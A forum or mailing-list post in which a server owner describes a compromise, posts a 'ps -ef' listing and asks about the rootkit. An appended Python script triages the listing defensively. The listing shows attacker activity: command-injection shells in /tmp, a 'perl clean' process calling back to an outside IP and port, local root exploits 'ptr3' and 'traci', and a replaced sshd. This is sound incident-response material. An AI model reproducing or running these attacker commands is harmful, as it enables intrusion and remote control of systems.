This morning my machine was also compromised in a similar fashion as described in your post here.
http://lists.debian.org/debian-security/2005/03/msg00112.html

Was the point of entry ever determined? I just happened to log onto my machine while this was taking place. I did a ps and killed everything except non-essential processes and mounted a directory tree I had with known-good binaries and used those to poke around the machine. I have no idea how they got in; there were a lot of processes running as nobody. I really only run apache as nobody, so that could be the point of entry. I will include the ps listing in the email. I would at least like to know the name of the rootkit if anyone has that info. I also saved all the binaries and have a tripwire report of the changed files.

Thanks

# ps -ef
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 Jan10 ?        00:00:24 init
root         2     1  0 Jan10 ?        00:00:00 [keventd]
root         3     0  0 Jan10 ?        00:00:01 [ksoftirqd_CPU0]
root         4     0  0 Jan10 ?        00:00:01 [ksoftirqd_CPU1]
root         5     1  0 Jan10 ?        00:52:23 [kswapd]
root         6     1  0 Jan10 ?        00:23:30 [kreclaimd]
root         7     1  0 Jan10 ?        00:06:15 [bdflush]
root         8     1  0 Jan10 ?        00:00:59 [kupdated]
root         9     1  0 Jan10 ?        00:00:00 [mdrecoveryd]
root        17     1  0 Jan10 ?        00:20:19 [kjournald]
root        92     1  0 Jan10 ?        00:00:00 [khubd]
root       185     1  0 Jan10 ?        00:00:00 [kjournald]
root       955     1  0 Jan10 ?        00:00:11 /usr/local/apache/bin/httpd
root      1294     1  0 Jan10 ?        00:00:00 [scsi_eh_2]
root      1335     1  0 Jan10 ?        00:00:04 crond
xfs       1407     1  0 Jan10 ?        00:00:00 xfs -droppriv -daemon
root      1471     1  0 Jan10 ?        00:00:00 /usr/local/snmp/sbin/snmpd
root      1504     1  0 Jan10 tty1     00:00:00 /sbin/mingetty tty1
root      1505     1  0 Jan10 tty2     00:00:00 /sbin/mingetty tty2
root      1506     1  0 Jan10 tty3     00:00:00 /sbin/mingetty tty3
root      1507     1  0 Jan10 tty4     00:00:00 /sbin/mingetty tty4
root      1508     1  0 Jan10 tty5     00:00:00 /sbin/mingetty tty5
root      1509     1  0 Jan10 tty6     00:00:00 /sbin/mingetty tty6
root      1896     1  0 Jan10 ?        00:23:49 /usr/local/sbin/named
root     18348     1  0 Jan10 ?        00:00:00 /usr/local/apache-https/bin/http
root     20871     1  0 Jan14 ?        00:00:00 /bin/sh /usr/local/mysql/bin/saf
mysql    20899 20871  0 Jan14 ?        00:08:03 /usr/local/mysql/libexec/mysqld
mysql    20901 20899  0 Jan14 ?        00:08:03 /usr/local/mysql/libexec/mysqld
mysql    20902 20901  0 Jan14 ?        00:09:27 /usr/local/mysql/libexec/mysqld
ntp      23268     1  0 May18 ?        00:00:01 ntpd -U ntp
root      5487     1  0 Jun20 ?        00:00:00 xinetd -stayalive -reuse -pidfil
root     25030     1  0 Jun25 ?        00:00:20 /usr/local/bin/perl /usr/local/p
nobody    6057 18348  0 Jul11 ?        00:00:07 /usr/local/apache-https/bin/http
nobody    6058 18348  0 Jul11 ?        00:00:10 /usr/local/apache-https/bin/http
nobody    6059 18348  0 Jul11 ?        00:00:09 /usr/local/apache-https/bin/http
nobody    6060 18348  0 Jul11 ?        00:00:09 /usr/local/apache-https/bin/http
nobody    6061 18348  0 Jul11 ?        00:00:07 /usr/local/apache-https/bin/http
nobody    6063 18348  0 Jul11 ?        00:00:09 /usr/local/apache-https/bin/http
nobody    6068 18348  0 Jul11 ?        00:00:08 /usr/local/apache-https/bin/http
bates    24856     1  0 Jul11 ?        00:00:01 ./server_linux -PID=tsserver2.pi
bates    24857 24856  0 Jul11 ?        00:00:00 ./server_linux -PID=tsserver2.pi
bates    24858 24857  0 Jul11 ?        00:00:01 ./server_linux -PID=tsserver2.pi
bates    24859 24857  0 Jul11 ?        00:00:01 ./server_linux -PID=tsserver2.pi
bates    24860 24857  0 Jul11 ?        00:00:00 ./server_linux -PID=tsserver2.pi
bates    24861 24857  0 Jul11 ?        00:00:00 ./server_linux -PID=tsserver2.pi
bates    24862 24857  0 Jul11 ?        00:00:00 ./server_linux -PID=tsserver2.pi
bates    24863 24857  0 Jul11 ?        00:00:00 ./server_linux -PID=tsserver2.pi
bates    24864 24857  0 Jul11 ?        00:00:00 ./server_linux -PID=tsserver2.pi
smmsp    23861     1  0 Jul15 ?        00:00:00 sendmail: Queue [EMAIL PROTECTED]:05:00
root     23878     1  0 Jul15 ?        00:00:05 sendmail: accepting connections
root     16095   955  0 Jul18 ?        00:00:00 /usr/local/sbin/cronolog --perio
root     16096   955  0 Jul18 ?        00:00:00 /usr/local/sbin/cronolog --perio
root     16097   955  0 Jul18 ?        00:00:00 /usr/local/sbin/cronolog --perio
root     16098   955  0 Jul18 ?        00:00:09 /usr/local/sbin/cronolog --perio
root     16099   955  0 Jul18 ?        00:00:00 /usr/local/sbin/cronolog --perio
root     16100   955  0 Jul18 ?        00:00:00 /usr/local/sbin/cronolog --perio
nobody   16101   955  0 Jul18 ?        00:07:18 /usr/local/apache/bin/httpd
nobody   16102   955  0 Jul18 ?        00:07:01 /usr/local/apache/bin/httpd
nobody   16103   955  0 Jul18 ?        00:07:16 /usr/local/apache/bin/httpd
nobody   16104   955  0 Jul18 ?        00:07:12 /usr/local/apache/bin/httpd
nobody   16105   955  0 Jul18 ?        00:07:23 /usr/local/apache/bin/httpd
nobody   16107   955  0 Jul18 ?        00:06:58 /usr/local/apache/bin/httpd
nobody   16109   955  0 Jul18 ?        00:07:31 /usr/local/apache/bin/httpd
nobody   16110   955  0 Jul18 ?        00:07:42 /usr/local/apache/bin/httpd
nobody   16114   955  0 Jul18 ?        00:07:21 /usr/local/apache/bin/httpd
nobody   16116   955  0 Jul18 ?        00:07:05 /usr/local/apache/bin/httpd
root       371     1  0 03:31 ?        00:00:06 /usr/local/bin/spamd -d -c -a -m
root      3665     1  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      3692  3665  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      3693  3692  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      3694  3692  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      3695  3692  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      3696  3692  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      3697  3692  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      3698  3692  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      3699  3692  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      3700  3692  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      3701  3692  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      3702  3692  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      3703  3692  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      3704  3692  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      3705  3692  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      3706  3692  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      3707  3692  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      3708  3692  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      3709  3692  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      3710  3692  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      3711  3692  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      3712  3692  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      3713  3692  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      3714  3692  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      3715  3692  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      3716  3692  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      3717  3692  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      3718  3692  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      3719  3692  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      3720  3692  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      3721  3692  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      3722  3692  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      3723  3692  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      3724  3692  0 06:01 ?        00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root      4471 23878  0 06:29 ?        00:00:00 sendmail: ./j6GIV8U9014887 mx00.
nobody    4742     1  0 06:39 ?        00:00:00 sh -c echo ;echo b_exp;cd /tmp;r
nobody    4745  4742  0 06:39 ?        00:00:00 perl clean 220.228.110.11 2025
nobody    4747  4745  0 06:39 ?        00:00:00 sh -c echo "`uname -a`";echo "`i
nobody    4752  4747  0 06:39 ?        00:00:00 /bin/sh
nobody    4824  4752  0 06:40 ?        00:00:00 ./ptr3
nobody    4825  4824  0 06:40 ?        00:00:00 [ptr3 <defunct>]
nobody    4826  4824  0 06:40 ?        00:00:00 [ptr3 <defunct>]
root      4827  4824  0 06:40 ?        00:00:00 [modprobe <defunct>]
root      4829  4824  0 06:40 ?        00:00:00 /bin/sh
root      4831     1  0 06:40 ?        00:00:00 ./ptr3
root      4858  4829  0 06:41 ?        00:00:00 /bin/sh ./make
root      4863  4858  0 06:41 ?        00:00:00 ./inst
root      4866     1  0 06:41 ?        00:00:00 chmod 777 conf configure inst li
root      4867  4863  0 06:41 ?        00:00:00 /bin/bash ./configure
root      4870  4866  0 06:41 ?        00:00:00 [chmod <defunct>]
root      4920     1  0 06:41 ?        00:00:00 chmod 755 /usr/local/bin/ssh2
root      4925  4920  0 06:41 ?        00:00:00 [chmod <defunct>]
root      4927     1  0 06:41 ?        00:00:00 mv -f sshd /usr/sbin/sshd
root      4929     1  0 06:41 ?        00:00:00 chown root.bin /usr/sbin/sshd
root      4932  4929  0 06:41 ?        00:00:00 [chown <defunct>]
root      4933  4927  0 06:41 ?        00:00:00 [mv <defunct>]
root      4940     1  0 06:41 ?        00:00:00 chown root.bin /usr/local/sbin/s
root      4950  4940  0 06:41 ?        00:00:00 [chown <defunct>]
root      4958     1  0 06:41 ?        00:00:00 hostname -f
root      4960  4958  0 06:41 ?        00:00:00 [hostname <defunct>]
nobody    4964     1  0 06:42 ?        00:00:00 sh -c echo ;echo b_exp;cd /tmp;r
nobody    4967  4964  0 06:42 ?        00:00:00 perl clean 220.228.110.11 2025
nobody    4968  4967  0 06:42 ?        00:00:00 sh -c echo "`uname -a`";echo "`i
nobody    4973  4968  0 06:42 ?        00:00:00 /bin/sh
nobody    4985  4973  0 06:42 ?        00:00:01
nobody    4996     1  0 06:42 ?        00:00:00 sh -c echo ;echo b_exp;cd /tmp;r
nobody    4999  4996  0 06:42 ?        00:00:00 perl clean 220.228.110.11 2025
nobody    5000  4999  0 06:43 ?        00:00:00 sh -c echo "`uname -a`";echo "`i
nobody    5005  5000  0 06:43 ?        00:00:00 /bin/sh
nobody    5030  5005  0 06:43 ?        00:00:00 ./traci
nobody    5031  5030  0 06:43 ?        00:00:00 ./traci
nobody    5032  5030  0 06:43 ?        00:00:00 [traci <defunct>]
root      5033  5030  0 06:43 ?        00:00:00 [modprobe <defunct>]
root      5034  5030  0 06:43 ?        00:00:00 /bin/sh
root      5035  5034  0 06:43 ?        00:00:00 ./traci
root      5055 23878  0 06:43 ?        00:00:00 sendmail: j6KDhuqh005055 e176012
root      5105     1  0 06:44 ?        00:00:00 minilogd
root      5233     1  0 06:46 ?        00:00:00 sendmail: accepting connections
root      5260     1  0 06:46 ?        00:00:00 sshd: bates [priv]
bates     5264  5260  0 06:46 ?        00:00:00 sshd: [EMAIL PROTECTED]/2
bates     5266  5264  0 06:46 pts/2    00:00:00 -bash
root      5423  5266  0 06:47 pts/2    00:00:00 bash
root      5562     1  0 06:49 ?        00:00:00 /usr/local/sbin/sshd
root      6465  5423 46 06:51 pts/2    00:01:55 tripwire
root      6965  5562  0 06:52 ?        00:00:00 sshd: bates [priv]
bates     6968  6965  0 06:52 ?        00:00:00 sshd: [EMAIL PROTECTED]/3
bates     6969  6968  0 06:52 pts/3    00:00:00 -bash
root      7061  6969  0 06:53 pts/3    00:00:00 bash
mysql     7343 20901  0 06:55 ?        00:00:00 /usr/local/mysql/libexec/mysqld
root      7344  7061  0 06:55 pts/3    00:00:00 ps -ef
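Editor's added example, not part of the original post or of any tool the poster used: a small triage script that rebuilds the process tree from `ps -ef` output and reports the three things worth looking at first in a listing like the one above. It flags every root process whose parent runs as a non-root uid (a uid can only go up across a fork through a setuid program or an exploit, so each hit needs an explanation: here the `./ptr3` chain under `nobody`, and the `bash` under the `bates` login session, which looks like an ordinary su), `sh -c` command lines owned by a service account that have been re-parented to init and work out of /tmp (the shape of a command injection whose httpd worker has since exited), and processes showing no command line at all. The sample listing is a constructed excerpt transcribed from the post; the heuristics and the list of scratch directories are the editor's assumptions, not a rootkit signature, and the root-to-user drops of `sshd: bates [priv]` are deliberately not flagged.

```python
"""Process-tree triage over a `ps -ef` listing (added example, not from the
original post).  Heuristics are the editor's assumptions about what to check
first on a box in this state; they are not a rootkit signature."""
from __future__ import annotations

from dataclasses import dataclass

# Constructed sample: an excerpt transcribed from the posted listing, trimmed
# to the processes the heuristics below care about.
SAMPLE_PS = """\
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 Jan10 ?        00:00:24 init
root       955     1  0 Jan10 ?        00:00:11 /usr/local/apache/bin/httpd
nobody   16101   955  0 Jul18 ?        00:07:18 /usr/local/apache/bin/httpd
nobody    4742     1  0 06:39 ?        00:00:00 sh -c echo ;echo b_exp;cd /tmp;r
nobody    4745  4742  0 06:39 ?        00:00:00 perl clean 220.228.110.11 2025
nobody    4747  4745  0 06:39 ?        00:00:00 sh -c echo "`uname -a`";echo "`i
nobody    4752  4747  0 06:39 ?        00:00:00 /bin/sh
nobody    4824  4752  0 06:40 ?        00:00:00 ./ptr3
nobody    4825  4824  0 06:40 ?        00:00:00 [ptr3 <defunct>]
root      4827  4824  0 06:40 ?        00:00:00 [modprobe <defunct>]
root      4829  4824  0 06:40 ?        00:00:00 /bin/sh
root      4831     1  0 06:40 ?        00:00:00 ./ptr3
root      4858  4829  0 06:41 ?        00:00:00 /bin/sh ./make
root      4927     1  0 06:41 ?        00:00:00 mv -f sshd /usr/sbin/sshd
nobody    4985  4973  0 06:42 ?        00:00:01
root      5260     1  0 06:46 ?        00:00:00 sshd: bates [priv]
bates     5264  5260  0 06:46 ?        00:00:00 sshd: [EMAIL PROTECTED]/2
bates     5266  5264  0 06:46 pts/2    00:00:00 -bash
root      5423  5266  0 06:47 pts/2    00:00:00 bash
root      6465  5423 46 06:51 pts/2    00:01:55 tripwire
"""


@dataclass(frozen=True)
class Proc:
    uid: str
    pid: int
    ppid: int
    cmd: str


def parse_ps(text: str) -> dict[int, Proc]:
    """Parse `ps -ef` output into a pid -> Proc map; the header line is skipped."""
    procs: dict[int, Proc] = {}
    for line in text.splitlines()[1:]:
        if not line.strip():
            continue
        # Columns: UID PID PPID C STIME TTY TIME CMD.  CMD may be absent when
        # a process has wiped its argv, so only split on the first 7 gaps.
        f = line.split(None, 7)
        procs[int(f[1])] = Proc(f[0], int(f[1]), int(f[2]), f[7] if len(f) > 7 else "")
    return procs


def privilege_gains(procs: dict[int, Proc]) -> list[tuple[int, str, int, str]]:
    """Root processes whose parent runs as a non-root uid.  Returns
    (parent pid, parent uid, child pid, child cmd) for each hit."""
    hits = []
    for p in procs.values():
        parent = procs.get(p.ppid)
        if parent is not None and p.uid == "root" and parent.uid != "root":
            hits.append((parent.pid, parent.uid, p.pid, p.cmd))
    return hits


def orphaned_service_shells(procs: dict[int, Proc],
                            scratch=("/tmp", "/var/tmp", "/dev/shm")) -> list[int]:
    """`sh -c ...` owned by a non-root account, re-parented to init, that cds
    into a world-writable scratch dir (scratch list is an assumption)."""
    return [p.pid for p in procs.values()
            if p.ppid == 1 and p.uid != "root"
            and p.cmd.startswith("sh -c") and any(d in p.cmd for d in scratch)]


def hidden_cmdlines(procs: dict[int, Proc]) -> list[int]:
    """Processes that show no command line at all."""
    return [p.pid for p in procs.values() if not p.cmd]


def ancestry(procs: dict[int, Proc], pid: int) -> list[str]:
    """Walk PPID links up towards init so a root shell can be traced back to
    the unprivileged process that spawned it.  Stops at a missing parent."""
    chain: list[str] = []
    while pid in procs and len(chain) < 64:   # length cap guards against ppid cycles
        p = procs[pid]
        chain.append(f"{p.uid}:{p.pid}:{p.cmd or '<no cmdline>'}")
        pid = p.ppid
    return chain


if __name__ == "__main__":
    procs = parse_ps(SAMPLE_PS)
    for ppid, puid, pid, cmd in privilege_gains(procs):
        print(f"root pid {pid} ({cmd!r}) under {puid} pid {ppid}:")
        print("    " + " <- ".join(ancestry(procs, pid)))
    print("orphaned service shells in scratch dirs:", orphaned_service_shells(procs))
    print("processes with no command line:", hidden_cmdlines(procs))
```

Run it against a full `ps -ef` capture (ideally one taken with the known-good `ps`, as the poster did) by feeding the file to `parse_ps`. The uid check is the one to read first: a root `/bin/sh` and a root `modprobe` zombie hanging off a `nobody`-owned `./ptr3`, reached from a `perl clean <ip> <port>` under an orphaned `sh -c ... cd /tmp` shell, is a complete chain from the web server's uid to root, and `ancestry()` prints exactly that path.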